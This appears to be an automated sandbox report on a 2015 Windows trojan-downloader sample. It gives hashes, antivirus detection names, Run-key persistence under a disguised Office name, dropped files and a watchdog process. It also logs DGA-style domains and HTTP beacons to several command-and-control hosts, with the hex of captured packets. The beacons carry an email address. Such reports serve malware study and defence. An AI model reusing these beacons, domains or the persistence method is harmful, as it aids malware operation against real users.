Analysis Date2015-10-31 19:48:59
MD5b201d7e97cec6bbbdd0d64f20fc3b56b
SHA13506405c909ee3e2c5e3c18a81dbe40290244d92

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 3ebdaadd35437372b5e866962b231ecf sha1: bacf8c5b2ada4d7f247478a6be4d3be6fad048eb size: 292864
Section.rdata md5: 6b85667ae64f49b8f3e7a053632566af sha1: 3037a8c0b20b934c889d350ab5e18a0f20791fb2 size: 34304
Section.data md5: c2d28bc3cbbd52f6f03518641880dff4 sha1: 67a1a7334cf9dbd5df507adc3b7c5a3d9ce88436 size: 88576
Timestamp2014-10-30 10:29:27
PackerMicrosoft Visual C++ ?.?
PEhash18b483a58ab2cea403826a9f552c476b0d9152d0
IMPhasha6a5c918b6d432a25a3b257a7fe8db23
AVRising0x592e592d
AVMcafeeTrojan-FEMT!B201D7E97CEC
AVAvira (antivir)TR/Crypt.ZPACK.Gen8
AVTwisterTrojan.Agent.VNC.aanx.mg
AVAd-AwareGen:Variant.Symmi.22722
AVAlwil (avast)Downloader-TLD [Trj]
AVEset (nod32)Win32/Rodecap.BE
AVGrisoft (avg)Win32/Cryptor
AVSymantecDownloader.Upatre!g15
AVFortinetW32/Agent.VNC!tr
AVBitDefenderGen:Variant.Symmi.22722
AVK7Trojan ( 004cb2771 )
AVMicrosoft Security EssentialsTrojanSpy:Win32/Nivdort.BD
AVMicroWorld (escan)Gen:Variant.Symmi.22722
AVMalwareBytesTrojan.Zbot.WHE
AVAuthentiumW32/Wonton.B.gen!Eldorado
AVFrisk (f-prot)no_virus
AVIkarusTrojan.FBAccountLock
AVEmsisoftGen:Variant.Symmi.22722
AVZillya!no_virus
AVKasperskyTrojan.Win32.Generic
AVTrend MicroTROJ_FORUCON.BMC
AVCAT (quickheal)Trojan.Dynamer.AC3
AVVirusBlokAda (vba32)no_virus
AVPadvishno_virus
AVBullGuardGen:Variant.Symmi.22722
AVArcabit (arcavir)Gen:Variant.Symmi.22722
AVClamAVno_virus
AVDr. WebTrojan.DownLoader12.12885
AVF-SecureGen:Variant.Symmi.22722
AVCA (E-Trust Ino)no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Office Superfetch Routing Video Extender ➝
C:\Documents and Settings\Administrator\Application Data\rycpxzngrvewd\msfzkpnta.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\rycpxzngrvewd\msfzkpnta.exe
Creates ProcessC:\Documents and Settings\Administrator\Application Data\rycpxzngrvewd\msfzkpnta.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\rycpxzngrvewd\msfzkpnta.exe

Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\rycpxzngrvewd\msfzkpnta.ord
Creates FileC:\Documents and Settings\Administrator\Application Data\rycpxzngrvewd\gmlackt.exe
Creates ProcessWATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\rycpxzngrvewd\msfzkpnta.exe"

Process
↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\rycpxzngrvewd\msfzkpnta.exe"

Network Details:

DNSmelbourneit.hotkeysparking.com
Type: A
8.5.1.16
DNSthinksystem.net
Type: A
69.161.143.132
DNScollegehonor.net
Type: A
54.186.220.79
DNSalonehonor.net
Type: A
98.139.135.129
DNSaloneneither.net
Type: A
195.22.26.252
DNSaloneneither.net
Type: A
195.22.26.253
DNSaloneneither.net
Type: A
195.22.26.254
DNSaloneneither.net
Type: A
195.22.26.231
DNShdredirect-lb-399551664.us-east-1.elb.amazonaws.com
Type: A
54.174.31.254
DNShdredirect-lb-399551664.us-east-1.elb.amazonaws.com
Type: A
54.208.74.215
DNSclasstrust.net
Type: A
208.100.26.234
DNSstrangereceive.net
Type: A
DNShistoryreceive.net
Type: A
DNSstrangequarter.net
Type: A
DNShistoryquarter.net
Type: A
DNSamountbranch.net
Type: A
DNSweatherbranch.net
Type: A
DNSamountbelieve.net
Type: A
DNSweatherbelieve.net
Type: A
DNSamountreceive.net
Type: A
DNSweatherreceive.net
Type: A
DNSamountquarter.net
Type: A
DNSweatherquarter.net
Type: A
DNSthickbranch.net
Type: A
DNSclassbranch.net
Type: A
DNSthickbelieve.net
Type: A
DNSclassbelieve.net
Type: A
DNSthickreceive.net
Type: A
DNSclassreceive.net
Type: A
DNSthickquarter.net
Type: A
DNSclassquarter.net
Type: A
DNSthinkhonor.net
Type: A
DNSpresenthonor.net
Type: A
DNSthinkneither.net
Type: A
DNSpresentneither.net
Type: A
DNSpresentsystem.net
Type: A
DNSthinktrust.net
Type: A
DNSpresenttrust.net
Type: A
DNSchiefhonor.net
Type: A
DNSchiefneither.net
Type: A
DNScollegeneither.net
Type: A
DNSchiefsystem.net
Type: A
DNScollegesystem.net
Type: A
DNSchieftrust.net
Type: A
DNScollegetrust.net
Type: A
DNSoftenhonor.net
Type: A
DNSoftenneither.net
Type: A
DNSoftensystem.net
Type: A
DNSalonesystem.net
Type: A
DNSoftentrust.net
Type: A
DNSalonetrust.net
Type: A
DNSmiddlehonor.net
Type: A
DNStwelvehonor.net
Type: A
DNSmiddleneither.net
Type: A
DNStwelveneither.net
Type: A
DNSmiddlesystem.net
Type: A
DNStwelvesystem.net
Type: A
DNSmiddletrust.net
Type: A
DNStwelvetrust.net
Type: A
DNSratherhonor.net
Type: A
DNSmorninghonor.net
Type: A
DNSratherneither.net
Type: A
DNSmorningneither.net
Type: A
DNSrathersystem.net
Type: A
DNSmorningsystem.net
Type: A
DNSrathertrust.net
Type: A
DNSmorningtrust.net
Type: A
DNSstrangehonor.net
Type: A
DNShistoryhonor.net
Type: A
DNSstrangeneither.net
Type: A
DNShistoryneither.net
Type: A
DNSstrangesystem.net
Type: A
DNShistorysystem.net
Type: A
DNSstrangetrust.net
Type: A
DNShistorytrust.net
Type: A
DNSamounthonor.net
Type: A
DNSweatherhonor.net
Type: A
DNSamountneither.net
Type: A
DNSweatherneither.net
Type: A
DNSamountsystem.net
Type: A
DNSweathersystem.net
Type: A
DNSamounttrust.net
Type: A
DNSweathertrust.net
Type: A
DNSthickhonor.net
Type: A
DNSclasshonor.net
Type: A
DNSthickneither.net
Type: A
DNSclassneither.net
Type: A
DNSthicksystem.net
Type: A
DNSclasssystem.net
Type: A
DNSthicktrust.net
Type: A
DNSthinklaughter.net
Type: A
HTTP GEThttp://strangequarter.net/index.php?email=metkar@seanet.ro&method=post&len
User-Agent:
HTTP GEThttp://thinksystem.net/index.php?email=metkar@seanet.ro&method=post&len
User-Agent:
HTTP GEThttp://collegehonor.net/index.php?email=metkar@seanet.ro&method=post&len
User-Agent:
HTTP GEThttp://alonehonor.net/index.php?email=metkar@seanet.ro&method=post&len
User-Agent:
HTTP GEThttp://aloneneither.net/index.php?email=metkar@seanet.ro&method=post&len
User-Agent:
HTTP GEThttp://classsystem.net/index.php?email=metkar@seanet.ro&method=post&len
User-Agent:
HTTP GEThttp://classtrust.net/index.php?email=metkar@seanet.ro&method=post&len
User-Agent:
Flows TCP192.168.1.1:1031 ➝ 8.5.1.16:80
Flows TCP192.168.1.1:1032 ➝ 69.161.143.132:80
Flows TCP192.168.1.1:1033 ➝ 54.186.220.79:80
Flows TCP192.168.1.1:1034 ➝ 98.139.135.129:80
Flows TCP192.168.1.1:1035 ➝ 195.22.26.252:80
Flows TCP192.168.1.1:1036 ➝ 54.174.31.254:80
Flows TCP192.168.1.1:1037 ➝ 208.100.26.234:80

Raw Pcap
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6d6574 6b617240 7365616e   mail=metkar@sean
0x00000020 (00032)   65742e72 6f266d65 74686f64 3d706f73   et.ro&method=pos
0x00000030 (00048)   74266c65 6e204854 54502f31 2e300d0a   t&len HTTP/1.0..
0x00000040 (00064)   41636365 70743a20 2a2f2a0d 0a436f6e   Accept: */*..Con
0x00000050 (00080)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000060 (00096)   486f7374 3a207374 72616e67 65717561   Host: strangequa
0x00000070 (00112)   72746572 2e6e6574 0d0a0d0a            rter.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6d6574 6b617240 7365616e   mail=metkar@sean
0x00000020 (00032)   65742e72 6f266d65 74686f64 3d706f73   et.ro&method=pos
0x00000030 (00048)   74266c65 6e204854 54502f31 2e300d0a   t&len HTTP/1.0..
0x00000040 (00064)   41636365 70743a20 2a2f2a0d 0a436f6e   Accept: */*..Con
0x00000050 (00080)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000060 (00096)   486f7374 3a207468 696e6b73 79737465   Host: thinksyste
0x00000070 (00112)   6d2e6e65 740d0a0d 0a0a0d0a            m.net.......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6d6574 6b617240 7365616e   mail=metkar@sean
0x00000020 (00032)   65742e72 6f266d65 74686f64 3d706f73   et.ro&method=pos
0x00000030 (00048)   74266c65 6e204854 54502f31 2e300d0a   t&len HTTP/1.0..
0x00000040 (00064)   41636365 70743a20 2a2f2a0d 0a436f6e   Accept: */*..Con
0x00000050 (00080)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000060 (00096)   486f7374 3a20636f 6c6c6567 65686f6e   Host: collegehon
0x00000070 (00112)   6f722e6e 65740d0a 0d0a0d0a            or.net......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6d6574 6b617240 7365616e   mail=metkar@sean
0x00000020 (00032)   65742e72 6f266d65 74686f64 3d706f73   et.ro&method=pos
0x00000030 (00048)   74266c65 6e204854 54502f31 2e300d0a   t&len HTTP/1.0..
0x00000040 (00064)   41636365 70743a20 2a2f2a0d 0a436f6e   Accept: */*..Con
0x00000050 (00080)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000060 (00096)   486f7374 3a20616c 6f6e6568 6f6e6f72   Host: alonehonor
0x00000070 (00112)   2e6e6574 0d0a0d0a 0d0a0d0a            .net........

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6d6574 6b617240 7365616e   mail=metkar@sean
0x00000020 (00032)   65742e72 6f266d65 74686f64 3d706f73   et.ro&method=pos
0x00000030 (00048)   74266c65 6e204854 54502f31 2e300d0a   t&len HTTP/1.0..
0x00000040 (00064)   41636365 70743a20 2a2f2a0d 0a436f6e   Accept: */*..Con
0x00000050 (00080)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000060 (00096)   486f7374 3a20616c 6f6e656e 65697468   Host: aloneneith
0x00000070 (00112)   65722e6e 65740d0a 0d0a0d0a            er.net......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6d6574 6b617240 7365616e   mail=metkar@sean
0x00000020 (00032)   65742e72 6f266d65 74686f64 3d706f73   et.ro&method=pos
0x00000030 (00048)   74266c65 6e204854 54502f31 2e300d0a   t&len HTTP/1.0..
0x00000040 (00064)   41636365 70743a20 2a2f2a0d 0a436f6e   Accept: */*..Con
0x00000050 (00080)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000060 (00096)   486f7374 3a20636c 61737373 79737465   Host: classsyste
0x00000070 (00112)   6d2e6e65 740d0a0d 0a0a0d0a            m.net.......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6d6574 6b617240 7365616e   mail=metkar@sean
0x00000020 (00032)   65742e72 6f266d65 74686f64 3d706f73   et.ro&method=pos
0x00000030 (00048)   74266c65 6e204854 54502f31 2e300d0a   t&len HTTP/1.0..
0x00000040 (00064)   41636365 70743a20 2a2f2a0d 0a436f6e   Accept: */*..Con
0x00000050 (00080)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000060 (00096)   486f7374 3a20636c 61737374 72757374   Host: classtrust
0x00000070 (00112)   2e6e6574 0d0a0d0a 0a0a0d0a            .net........


Strings